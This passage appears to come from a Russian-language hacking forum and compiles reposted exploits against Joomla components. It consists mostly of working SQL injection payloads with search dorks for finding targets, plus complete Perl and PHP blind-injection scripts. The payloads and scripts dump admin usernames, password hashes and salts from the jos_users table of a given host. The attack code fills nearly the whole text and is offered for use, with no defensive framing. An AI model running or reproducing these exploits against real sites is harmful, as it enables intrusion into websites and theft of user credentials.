    $ua->proxy('http', "http://".$options{"p"});
  }

  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "jb_post_footer";

  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

Joomla Component iDoBlog <= b24 Remote SQL Injection Vulnerability

Код:

#########################################################
#                            #
#    Joomla Component idoblog Remote SQL Injection    #
#                            #
#########################################################

########################################
[*] Founded by : His0k4 (Algerian HaCkeR);[*] Contact:     His0k4.hlm[at]gmail.com[*] Greetz :     All friends & muslims HaCkeRs  :)[*] Greetz2 :    http://www.palcastle.org/cc/  

########################################
[*] Script_Name: "Joomla"[*] Component_Name: "com_idoblog"

########################################
[*] DORK: inurl:com_idoblog

########################################
[*] P.O.C : /index.php?option=com_idoblog&task=userblog&userid={SQL}[*] Example: /index.php?option=com_idoblog&task=userblog&userid=<valid_userid> and 1=1 UNION SELECT user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

########################################

Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability

Код:

#                            #
#    Joomla Component joomradio Remote SQL Injection    #
#                            #
#########################################################

########################################
[*] Founded by : His0k4 (Algerian HaCkeR);[*] Contact:     His0k4.hlm[at]gmail.com[*] Greetz :     All friends & muslims HaCkeRs  :)[*] Greetz2 :    http://www.palcastle.org/cc/  

########################################
[*] Script_Name: "Joomla"[*] Component_Name: "com_joomradio"

########################################
[*] DORK: inurl:com_joomradio

########################################
[*] P.O.C 1: /index.php?option=com_joomradio&page=show_radio&id={SQL}[*] Example: /index.php?option=com_joomradio&page=show_radio&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
[*] P.O.C 2: /index.php?option=com_joomradio&page=show_video&id={SQL}[*] Example: /index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
########################################

Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability

Код:

/---------------------------------------------------------------\
\                                                /
/        Joomla Component equotes  Remote SQL injection         \
\                                                /
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] Dork      :  inurl:com_eQuotes
[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_equotes&id={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...

Joomla Component acctexp <= 0.12.x Blind SQL Injection Exploit

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "   #############################################################\n";
  print "   #   Joomla Component acctexp Blind SQL Injection Exploit    #\n";
  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                         #\n";
  print "   #                                                           #\n";
  print "   #   Conctact: His0k4.hlm[at]gamil.com                       #\n";
  print "   #   Greetz:   All friends & muslims HacKeRs                 #\n";
  print "   #   Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "   #                                                           #\n";
  print "   #   Usage:   perl acctexp.pl host path <options>            #\n";
  print "   #   Example: perl acctexp.pl www.host.com /joomla/ -g 1     #\n";
  print "   #                                                           #\n";
  print "   #   Options:                                                #\n";
  print "   #     -g    usage  id                                       #\n";
  print "   #   Note:                                                   #\n";
  print "   #   Don't forget to change the match if you have to do it :)#\n";
  print "   #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $gid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "g=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"g"})
{
  $gid = $options{"g"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $gid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $gid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $rid   = shift;
  my $i     = shift;
  my $h     = shift;

  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }

  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Verify Password";

  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

#

Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "   #############################################################\n";
  print "   #   Joomla Component Joo!BB Blind SQL Injection Exploit     #\n";
  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                         #\n";
  print "   #                                                           #\n";
  print "   #   Conctact: His0k4.hlm[at]gamil.com                       #\n";
  print "   #   Greetz:   All friends & muslims HacKeRs                 #\n";
  print "   #   Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "   #                                                           #\n";
  print "   #   Usage:   perl jobb.pl host path <options>               #\n";
  print "   #   Example: perl jobb.pl www.host.com /joomla/ -f 1        #\n";
  print "   #                                                           #\n";
  print "   #   Options:                                                #\n";
  print "   #     -f    Forum  id                                       #\n";
  print "   #   Note:                                                   #\n";
  print "   #   If you need to change the match value so do it :D       #\n";
  print "   #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $fid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"f"})
{
  $fid = $options{"f"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $fid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $fid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $fid   = shift;
  my $i     = shift;
  my $h     = shift;

  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }

  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Announcements";

  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

#

Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "   #############################################################\n";
  print "   #   Joomla Component mycontent Blind SQL Injection Exploit  #\n";
  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                         #\n";
  print "   #                                                           #\n";
  print "   #   Conctact: His0k4.hlm[at]gamil.com                       #\n";
  print "   #   Greetz:   All friends & muslims HacKeRs                 #\n";
  print "   #   Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "   #                                                           #\n";
  print "   #   Usage:   perl mycontent.pl host path <options>          #\n";
  print "   #   Example: perl mycontent.pl www.host.com /joomla/ -r 10  #\n";
  print "   #                                                           #\n";
  print "   #   Options:                                                #\n";
  print "   #     -r    Valid  id                                       #\n";
  print "   #   Note:                                                   #\n";
  print "   #   If the exploit failed                                   #\n";
  print "   #   Change 'regexp' value to the title of the page          #\n";
  print "   #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $rid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"r"})
{
  $rid = $options{"r"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $rid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $rid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $rid   = shift;
  my $i     = shift;
  my $h     = shift;

  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }

  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "E-mail";

  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

[balt]

Joomla Component com_biblestudy 1.5.0 (id) SQL Injection Exploit

Код:

#!/usr/bin/perl -w
# Joomla Component (biblestudy) Remote SQL Injection
########################################
#[*] Founded &  Exploited by : Stack & Jadi
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn &Room-Hackers All muslims HaCkeRs  :)
########################################
#  P0c 1: /index.php?option=com_biblestudy&view=mediaplayer&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,concat_ws(CHAR(58),username,password),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+jos_users--
# P0c 2: index.php?option=com_biblestudy&view=mediaplayer&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(CHAR(58),username,password),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+fro
m+jos_users--
########################################
#  exploit aported password crypted maybe is crypted with mysql
#  exploit tatjibe password mcrypté :d
#  mgharba :d:d:d:d
########################################
#----------------------------------------------------------------------------#
########################################
# * TITLE:          PerlSploit Class
# * REQUIREMENTS:   PHP 4 / PHP 5
# * VERSION:        v.1
# * LICENSE:        GNU General Public License
# * ORIGINAL URL:   http://www.v4-Team/v4.txt
# * FILENAME:       PerlSploitClass.pl
# *
# * CONTACT:        Wanted  (french / english / arabic / moroco Darija :d )
# * THNX : AllaH
# * GREETZ:         Houssamix & Djekmani
#  Special Thnx To : Simo64
########################################
#----------------------------------------------------------------------------#
########################################
system("color 02");
print "\t\t############################################################\n\n";
print "\t\t#       Joomla Component (biblestudy) Remote SQL Injection    #\n\n";
print "\t\t#                        by Stack & Jadi                    #\n\n";
print "\t\t############################################################\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
system("color f");
########################################
#----------------------------------------------------------------------------#
########################################
#the username of  joomla
$user="username";
#the pasword of  joomla
$pass="password";
#the tables of joomla
$tab="jos_users";
########################################
#----------------------------------------------------------------------------#
########################################
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
#----------------------------------------------------------------------------#
########################################
$host = $ARGV[0] . "/index.php?option=com_biblestudy&view=mediaplayer&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+".$tab."/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /<user>(.*?)<user>/){
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Admin User : $1";
}
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~/<pass>(.*?)<pass>/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
########################################
#-------------------Exploit exploited by Stack --------------------#
########################################

Joomla component prayercenter <= 1.4.9 (id) SQL Injection Vulnerability

Код:

/---------------------------------------------------------------\
\                                                /
/      Joomla Component  prayercenter  Remote SQL injection     \
\                                                /
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] Dork      :  inurl:"com_prayercenter"
[*] POC        : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
[*] Note       : Sometimes you need to register for doing this exploit
                
----------------------------------------------------------------------------[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...[*] Greetings2 : http://www.palcastle.org/cc

Joomla Component Artist (idgalery) SQL Injection Vulnerability

Код:

Cr@zy_King / 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ].uk

Joomla Component Artist Remote Sql İnjection

M4sterZ sqL / t4cs1zkr4L : )

Down : http://www.joomlaresource.com/joomla_downloads/Download/Joomla_Components/Artists/

http://localhost/index.php?option=com_artist&idgalery=Sql

Sql : -1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*

gretZ : aLL My Friends & CoderX Federation & Code Hunters and str0ke

-----------------------------

[CENTER]
Joomla Component xsstream-dm 0.01b Remote SQL Injection Exploit[/CENTER]

Код:

#########################################################
#     Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection    #
#########################################################

########################################
#[*] Founded by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
#[*] Contact: Ev!L
#[*] Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs  :)
########################################

#[*] Script_Name: "Joomla"
#[*] Component_Name: "xsstream-dm" 0.01 Beta


########################################



print "\t\t########################################################\n\n";
print "\t\t#                        Viva Islam                    #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection  #\n\n";
print "\t\t#           by Houssamix & Stack-Terrorist             #\n\n";
print "\t\t#              from H-T Team & v4 Team                 #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="jos_users";
#the the union of joomla
$un="/**/union/**/select/**/";
#the vulnerable compenent  
$com="com_xsstream-dm&Itemid";
# Lets star exploiting
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$user.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<div class="contentpagetitle">(.*?)<\/div>/){
        
        print "\n[+] Admin User : $1";
}
$host2 = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$pass.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";

$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;

if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t#   Exploit has ben aported user and password hash   #\n\n";
}

else{print "\n[-] Exploit Failed...\n";}



#exploit discovered by Houssamix From H-T Team
# exploit exploited by Stack-Terroris

Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit

Код:

<?
//Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+
//Greets: all members of antichat.ru & cih.ms

//options
set_time_limit(0);
ignore_user_abort(1);
$norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14';
$url=$_GET['url'];
$where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1';
$id=(!empty($_GET['id']))?$_GET['id']:'1';

//functions
function send_xpl($url, $xpl){
    global $id;
    $u=parse_url($url);
    $req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n";
    $req.="Host: ".$u['host']."\r\n";
    $req.="User-Agent: ".$xpl."\r\n";
    $req.="Connection: Close\r\n\r\n";
    $fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
    fwrite($fs, $req);
    $res=fread($fs, 4096);  
    fclose($fs);
    return $res;
}

function xpl($condition, $pos){
    global $norm_ua;
    global $where;
    $xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
    return $xpl;
}

//main
echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n");
send_xpl($url, $norm_ua);

//get md5
for($i=0;$i<=32;$i++){
    $buff=send_xpl($url,xpl('>58', $i));
    if(preg_match('/Duplicate entry/', $buff)){
        for($j=97;$j<=102;$j++){
            if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
        }
    } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
        for($j=48;$j<=57;$j++){
            if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
        }
    } else {
        die("exploit failed");
    }
}

//check Joomla version
$test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*";
$buff=send_xpl($url,$test);
if(preg_match('/Duplicate entry/', $buff)) die($pass);

//separator
$pass.=':';

//get salt
for($i=33;$i<=49;$i++){
    $buff=send_xpl($url,xpl('>58', $i));
    if(preg_match('/Duplicate entry/', $buff)){
        $buff=send_xpl($url, xpl('>91',$i));
        if(preg_match('/Duplicate entry/', $buff)){
            for($j=97;$j<=122;$j++){
                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
            }
        } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
            for($j=65;$j<=90;$j++){
                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
            }
        } else {
            die("exploit failed");
        }
    } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
            for($j=48;$j<=57;$j++){
                if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
            }
    } else {
        die("exploit failed");
    }
}
echo $pass;

[balt]

Jooma Component Webhosting (catid) Blind SQL Injection

Код:

#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet
$info{'info'} = {
"author" => ["cO2,Inphex"],
"name" => ["Joomla com_webhosting Blind SQL Injection"],
"version" => [],
"description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"],
"options" =>
{
  "agent" => "",
  "proxy" => "",
  "default_headers" => [
   ["key","value"]],
  "timeout" => 2,
  "cookie" =>    
  {
   "cookie" => ["key=value"],
  },
},
"sending_options" =>
{
   "host" => $host_,
   "path" => $path_".index.php",          
      "port" => 80,                
   "method_a" => "SQL_INJECTION_BLIND",
   "attack" =>
  {
    "option" => ["get","option","com_webhosting"],
    "catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
    "regex" => [[$non_find]],

  },
},
};
&start($info{'info'},222);
open FH,">>ok.html";
print FH $return{222}{'content'};
sub start
{
$a_ = shift;
$id = shift;
$get_dA = get_d_p_s("get");
$post_dA = get_d_p_s("post");
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
my $jj = 1;
my $ii = 48;
    my $hh = 1;
my $ppp = 0;
my $s = shift;
my $a = "";
my $res_p = "";
my $h = "";
($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
$ua = LWP::UserAgent->new;
$ua->timeout($a_->{'options'}{'timeout'});
if ($a_->{'options'}{'proxy'}) {
     $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
}
$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
$ua->agent($agent);
{                                                
  while (($k,$v) = each(%{$a_}))
   {
   if ($k ne "options" && $k ne "sending_options")
    {
    foreach $r (@{$a_->{$k}})
     {
     if ($a_->{$k}[0])
      {
      print $k.":".$a_->{$k}[0]."\n";
      }
     }
    }
   }

  foreach $j (@{$a_->{'options'}{'default_headers'}})
   {  
   $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
   $m++;
   }
  if ($a_->{'options'}{'cookie'}{'cookie'}[0])
   {        
   $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
   }
  
}
switch ($method_m)      
{
  case "attack" { &attack();}
  case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
  case "REMOTE_COMMAND_EXECUTION" { &attack();}
  case "REMOTE_CODE_EXECUTION" {&attack();}
  case "REMOTE_FILE_INCLUSION" { &attack();}
  case "LOCAL_FILE_INCLUSION" { &attack(); }
  else { &attack(); }
}

sub attack
{
  
  if ($post_dA eq "") {
   $method = "get";
  } elsif ($post_dA ne "")
  {
   $method = "post";
  }
  if ($method eq "get") {
   $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
   ${$a_}{$id}{'content'} = $res_p;
   foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
    
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
     {
     if (${$jj} ne "")
      {
      ${$a_}{$id}{'regex'}[$h] = ${$jj};
      }
      $jj++;
     }
     $h++;
    }
  } elsif ($method eq "post")
  {
   $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
  
   ${$a_}{$id}{'content'} = $res_p;
   foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
     {
     if (${$jj} ne "")
      {
      ${$a_}{$id}{'regex'}[$h] = ${$jj};
      }
      $jj++;
     }
     $h++;
    }
  }
}
sub sql_injection_blind
{
  syswrite STDOUT,$column.":";
  while ()
   {
   while ($ii <= 90)
    {
    if(check($ii,$hh) == 1)
    {
     syswrite STDOUT,lc(chr($ii));
     $hh++;
     $chr = $chr.chr($ii);
     }
     $ii++;
   }
   push(@ffs,length($chr));
   if (($#ffs -1) == $ffs)
    {
    print "\nFinished/Error\n";
    exit;
    }
    $ii = 48;
  }
}
sub check($$)
{
  $ii = shift;
  $hh = shift;
  if (get_d_p_s("post") ne "")
   {
   $method = "post";
  } else { $method = "get";}
  if ($method eq "get")
   {
   $ppp++;
   $query = modify($get_dA,$ii,$hh);
   $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
   foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
     {
     return 1;
     }
     else
    {
      return 0;
    }
    $h++;
   }
  } elsif ($method eq "post")
   {
   $ppp++;
   $query_g = modify($get_dA,$ii,$hh);
   $query_p = modify($post_dA,$ii,$hh);
  
   $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
   foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
     {
     return 1;
     }
     else
     {
      return 0;
     }
    $h++;
   }
  }
}
    sub modify($$$)
{
     $string = shift;
     $replace_by = shift;
     $replace_by1 = shift;
     if ($string !~/\$i/ && $string !~/\$h/) {
      print $string;
         } elsif ($string !~/\$i/)
  {
          $ff = substr($string,0,index($string,"\$h"));
             $ee =  substr($string,rindex($string,"\$h")+2);
             $string = $ff.$replace_by1.$ee;
             return $string;
  } elsif ($string !~/\$h/)
  {
         $f = substr($string,0,index($string,"\$i"));
         $e = substr($string,rindex($string,"\$i")+2);
         $string = $f.$replace_by.$e;
      return $string;
  } else
  {
      $f = substr($string,0,index($string,"\$i"));
         $e = substr($string,rindex($string,"\$i")+2);
         $string = $f.$replace_by.$e;
      $ff = substr($string,0,index($string,"\$h"));
         $ee =  substr($string,rindex($string,"\$h")+2);
         $string = $ff.$replace_by1.$ee;
      return $string;
  }
}
sub get_d_p_s
{
  $g_d_p_s = shift;
  $post_data = "";
  $get_data = "";
  $header_data = "";
  %header_dA = ();
  while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
   {
   if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
    {
    $method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
    }
    elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post")
    {
     $method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
     }
     elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
    {
            $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
    }
    $hp++;
   }
  $yy = $#get;
  while ($bb <= $#get)
   {
   $get_data .= $get[$yy]."&";
   $bb++;
   $yy--;
   }
  $l = $#post;
  while ($k <= $#post)
   {
  
   $post_data .= $post[$l]."&";
   $k++;
   $l--;
   }
  if ($g_d_p_s eq "get")
   {
  
   return $get_data;
   }
   elsif ($g_d_p_s eq "post")
  {
   return $post_data;
  } elsif ($g_d_p_s eq "header")
  {
   return %header_dA;
  }
}
sub get_data
{
  $h_host_h_xdsjaop = shift;
  $h_path_h_xdsjaop = shift;
  %hash = get_d_p_s("header");
     while (($u,$c) = each(%hash))
   {
   $ua->default_headers->push_header($u => $c);
   }
  $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
  return $req->content;
}
sub post_data
{
  $h_host_h_xdsjaop = shift;
  $h_path_h_xdsjaop = shift;
  $content_type = shift;
  $send = shift;
  %hash = get_d_p_s("header");
     while (($u,$c) = each(%hash))
   {
      $ua->default_headers->push_header($u => $c);
   }
  $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
  $req->content_type($content_type);
  $req->content($send);
  $res = $ua->request($req);
  return $res->content;
}
}

[z00MAN]

[обзор за декарь 2008]

exploits/shellcode

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ]

